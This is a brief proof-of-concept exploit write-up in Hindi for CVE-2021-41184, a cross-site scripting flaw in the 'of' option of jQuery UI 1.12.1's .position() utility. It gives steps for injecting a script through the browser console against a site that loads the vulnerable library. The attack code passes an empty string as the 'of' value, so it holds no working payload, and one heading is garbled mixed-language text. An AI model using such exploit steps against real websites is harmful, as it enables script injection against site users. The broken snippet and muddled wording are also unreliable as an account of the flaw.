
CVE-2021-41184 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, jQuery UI के .position() उपयोगिता में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, जो संस्करण 1.12.1 को लक्षित करती है।
शोषण माध्यम CVE-2021-41184 XSS of विकल्प में .position() उपयोगिता
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------अवधारणा प्रमाण---------------------------------------------------------------
URL खोलें
इंस्पेक्ट खोलें
साइट तत्वों में कुछ ID खोजें
3.1 #ID
कंसोल टैब पर जाएं
बिंदु 3.1 पर चयनित ID के साथ स्क्रिप्ट इंजेक्ट करें
5.1 स्क्रिप्ट
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});